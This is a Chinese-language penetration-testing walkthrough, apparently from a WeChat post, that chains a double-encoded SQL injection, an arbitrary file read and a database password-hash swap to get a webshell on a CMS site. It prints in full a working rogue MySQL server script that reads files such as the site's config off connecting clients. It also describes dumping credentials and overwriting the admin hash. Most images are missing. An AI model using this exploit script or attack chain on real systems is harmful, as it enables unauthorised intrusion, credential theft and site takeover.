图文详解多种漏洞配合利用--getshell(附脚本)

margin

图文详解多种漏洞配合利用--getshell(附脚本) (qq.com)

​

       
• 
         
• 
         
• 
         
• 
         
• 
         
• 
  

多种漏洞配合利用--getshell写在前面环境信息收集SQL二次编码注入漏洞利用任意文件读取漏洞利用获取指定密文写在前面在渗透中，我们往往需要结合多种漏洞进行getshell，下面将通过多种漏洞配合利用来getshell服务器。
环境

​

编辑
信息收集netdiscover探测存活主机

​

编辑

​

编辑

nmap探测web服务器端口开放情况

Namp扫描端口的详细信息

使用Whatweb进行cms识别，识别出网站cms
SQL二次编码注入漏洞利用利用网上公开的漏洞进行利用。由于该cms报过非常多漏洞，使用二次编码SQL注入进行利用。先测试这个网站的漏洞有没有给修复。

​

编辑

发现过滤了'

使用二次编码后发现可以成功访问
此时使用SQLmap中二次编码模块进行注入

获取数据库用户

获取数据库名称

获取www_ddd4_com数据库的表

获取doc_user表中的数据，得到后台登录的账号和密码的密文
当得到这一串网站后台的登录密文后，我尝试各种方式破解，结果都无效。要想登录后台还要想办法，于是先寻找网站的后台

​

编辑
任意文件读取漏洞利用该cms还报过任意文件读取漏洞，直接使用exp进行攻击
附上师傅写的exp:
​

1. #!/usr/bin/env python
   
2. #coding: utf8
   
3. 
   
4. import socket
   
5. import asyncore
   
6. import asynchat
   
7. import struct
   
8. import random
   
9. import logging
   
10. import logging.handlers
    
11. 
    
12. PORT = 3306
    
13. 
    
14. log = logging.getLogger(__name__)
    
15. 
    
16. log.setLevel(logging.INFO)
    
17. tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
    
18. tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
    
19. log.addHandler(
    
20.     tmp_format
    
21. )
    
22. 
    
23. filelist = (
    
24.     '/www/wwwroot/www.ddd4.com/config/doc-config-cn.php',//为要读取的文件
    
25. )
    
26. 
    
27. #================================================
    
28. #=======No need to change after this lines=======
    
29. #================================================
    
30. 
    
31. __author__ = 'Gifts'
    
32. 
    
33. def daemonize():
    
34.     import os, warnings
    
35.     if os.name != 'posix':
    
36.         warnings.warn('Cant create daemon on non-posix system')
    
37.         return
    
38. 
    
39.     if os.fork(): os._exit(0)
    
40.     os.setsid()
    
41.     if os.fork(): os._exit(0)
    
42.     os.umask(0o022)
    
43.     null=os.open('/dev/null', os.O_RDWR)
    
44.     for i in xrange(3):
    
45.         try:
    
46.             os.dup2(null, i)
    
47.         except OSError as e:
    
48.             if e.errno != 9: raise
    
49.     os.close(null)
    
50. 
    
51. class LastPacket(Exception):
    
52.     pass
    
53. 
    
54. class OutOfOrder(Exception):
    
55.     pass
    
56. 
    
57. class mysql_packet(object):
    
58.     packet_header = struct.Struct('<Hbb')
    
59.     packet_header_long = struct.Struct('<Hbbb')
    
60.     def __init__(self, packet_type, payload):
    
61.         if isinstance(packet_type, mysql_packet):
    
62.             self.packet_num = packet_type.packet_num + 1
    
63.         else:
    
64.             self.packet_num = packet_type
    
65.         self.payload = payload
    
66. 
    
67.     def __str__(self):
    
68.         payload_len = len(self.payload)
    
69.         if payload_len < 65536:
    
70.             header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
    
71.         else:
    
72.             header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
    
73. 
    
74.         result = "{0}{1}".format(
    
75.             header,
    
76.             self.payload
    
77.         )
    
78.         return result
    
79. 
    
80.     def __repr__(self):
    
81.         return repr(str(self))
    
82. 
    
83.     @staticmethod
    
84.     def parse(raw_data):
    
85.         packet_num = ord(raw_data[0])
    
86.         payload = raw_data[1:]
    
87. 
    
88.         return mysql_packet(packet_num, payload)
    
89. 
    
90. class http_request_handler(asynchat.async_chat):
    
91. 
    
92.     def __init__(self, addr):
    
93.         asynchat.async_chat.__init__(self, sock=addr[0])
    
94.         self.addr = addr[1]
    
95.         self.ibuffer = []
    
96.         self.set_terminator(3)
    
97.         self.state = 'LEN'
    
98.         self.sub_state = 'Auth'
    
99.         self.logined = False
    
100.         self.push(
     
101.             mysql_packet(
     
102.                 0,
     
103.                 "".join((
     
104.                     '\x0a',  # Protocol
     
105.                     '5.6.28-0ubuntu0.14.04.1' + '\0',
     
106.                     '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
     
107.                 ))            )
     
108.         )
     
109. 
     
110.         self.order = 1
     
111.         self.states = ['LOGIN', 'CAPS', 'ANY']
     
112. 
     
113.     def push(self, data):
     
114.         log.debug('Pushed: %r', data)
     
115.         data = str(data)
     
116.         asynchat.async_chat.push(self, data)
     
117. 
     
118.     def collect_incoming_data(self, data):
     
119.         log.debug('Data recved: %r', data)
     
120.         self.ibuffer.append(data)
     
121. 
     
122.     def found_terminator(self):
     
123.         data = "".join(self.ibuffer)
     
124.         self.ibuffer = []
     
125. 
     
126.         if self.state == 'LEN':
     
127.             len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
     
128.             if len_bytes < 65536:
     
129.                 self.set_terminator(len_bytes)
     
130.                 self.state = 'Data'
     
131.             else:
     
132.                 self.state = 'MoreLength'
     
133.         elif self.state == 'MoreLength':
     
134.             if data[0] != '\0':
     
135.                 self.push(None)
     
136.                 self.close_when_done()
     
137.             else:
     
138.                 self.state = 'Data'
     
139.         elif self.state == 'Data':
     
140.             packet = mysql_packet.parse(data)
     
141.             try:
     
142.                 if self.order != packet.packet_num:
     
143.                     raise OutOfOrder()
     
144.                 else:
     
145.                     # Fix ?
     
146.                     self.order = packet.packet_num + 2
     
147.                 if packet.packet_num == 0:
     
148.                     if packet.payload[0] == '\x03':
     
149.                         log.info('Query')
     
150. 
     
151.                         filename = random.choice(filelist)
     
152.                         PACKET = mysql_packet(
     
153.                             packet,
     
154.                             '\xFB{0}'.format(filename)
     
155.                         )
     
156.                         self.set_terminator(3)
     
157.                         self.state = 'LEN'
     
158.                         self.sub_state = 'File'
     
159.                         self.push(PACKET)
     
160.                     elif packet.payload[0] == '\x1b':
     
161.                         log.info('SelectDB')
     
162.                         self.push(mysql_packet(
     
163.                             packet,
     
164.                             '\xfe\x00\x00\x02\x00'
     
165.                         ))
     
166.                         raise LastPacket()
     
167.                     elif packet.payload[0] in '\x02':
     
168.                         self.push(mysql_packet(
     
169.                             packet, '\0\0\0\x02\0\0\0'
     
170.                         ))
     
171.                         raise LastPacket()
     
172.                     elif packet.payload == '\x00\x01':
     
173.                         self.push(None)
     
174.                         self.close_when_done()
     
175.                     else:
     
176.                         raise ValueError()
     
177.                 else:
     
178.                     if self.sub_state == 'File':
     
179.                         log.info('-- result')
     
180.                         log.info('Result: %r', data)
     
181. 
     
182.                         if len(data) == 1:
     
183.                             self.push(
     
184.                                 mysql_packet(packet, '\0\0\0\x02\0\0\0')
     
185.                             )
     
186.                             raise LastPacket()
     
187.                         else:
     
188.                             self.set_terminator(3)
     
189.                             self.state = 'LEN'
     
190.                             self.order = packet.packet_num + 1
     
191. 
     
192.                     elif self.sub_state == 'Auth':
     
193.                         self.push(mysql_packet(
     
194.                             packet, '\0\0\0\x02\0\0\0'
     
195.                         ))
     
196.                         raise LastPacket()
     
197.                     else:
     
198.                         log.info('-- else')
     
199.                         raise ValueError('Unknown packet')
     
200.             except LastPacket:
     
201.                 log.info('Last packet')
     
202.                 self.state = 'LEN'
     
203.                 self.sub_state = None
     
204.                 self.order = 0
     
205.                 self.set_terminator(3)
     
206.             except OutOfOrder:
     
207.                 log.warning('Out of order')
     
208.                 self.push(None)
     
209.                 self.close_when_done()
     
210.         else:
     
211.             log.error('Unknown state')
     
212.             self.push('None')
     
213.             self.close_when_done()
     
214. 
     
215. class mysql_listener(asyncore.dispatcher):
     
216.     def __init__(self, sock=None):
     
217.         asyncore.dispatcher.__init__(self, sock)
     
218. 
     
219.         if not sock:
     
220.             self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
     
221.             self.set_reuse_addr()
     
222.             try:
     
223.                 self.bind(('', PORT))
     
224.             except socket.error:
     
225.                 exit()
     
226. 
     
227.             self.listen(5)
     
228. 
     
229.     def handle_accept(self):
     
230.         pair = self.accept()
     
231. 
     
232.         if pair is not None:
     
233.             log.info('Conn from: %r', pair[1])
     
234.             tmp = http_request_handler(pair)
     
235. 
     
236. z = mysql_listener()
     
237. # daemonize()
     
238. asyncore.loop()

复制代码

​

       
•         获取报错路径
                 
  ​
          编辑
         
          读取到/etc/passsword的文件
         
          读取到数据库的配置文件，获取到数据库的账号与密文
         
          利用刚刚得到的密文进行MySQL数据库连接，这里的MySQL支持外连
          也可以通过数据库查询获取密文
         
          此时我已经拿到数据库权限，但想要getshell还是要继续思考。
          获取指定密文        为了更好的分析，在本地搭建了一个网站，找到登录文件后发现加密函数，寻找该功能函数，还不死心，继续分析是否可逆。
                 
  ​
          编辑
          到达该功能函数页面以后，发现通过sha1、md5等加密算法结合加密，说明此密文不可逆。此时我要怎么办呢？想到刚刚已经拿到数据库权限，如果我根据自己的密码按照该网站的加密算法去生成密文，通过数据库权限更改密文，此时我不就知道密码了吗？
                 
  ​
          编辑
          马上根据自己的需要，将明文admin通过登录界面的代码来进行输出加密后的密文，这里为了抓包更好寻找密文，前面加了一些66垃圾数据。
          其中这一串代码为新加的代码，目的是为了获取admin的密文
                  $docEncryption = new docEncryption('admin');echo $docEncryption->to_string();```[![]()]()通过抓包后得到密文[![]()]()除了以上方法外，我们可以直接利用我们搭建网站设置的密码，通过数据库去查询密文，照样可以获取密文[![]()]()在获取的数据库权限中去更改密文[![]()]()确认密文更改成功[![]()]()通过修改的密码进入后台后，从功能点出发，发现可以写码。[![]()]()成功getshell[![]()]()## 总体思路[![]()]()## 总结通过此实例，我们发现在渗透时要善于利用网上公开漏洞进行渗透，并且要学会多种漏洞结合进行利用。       
  
  

​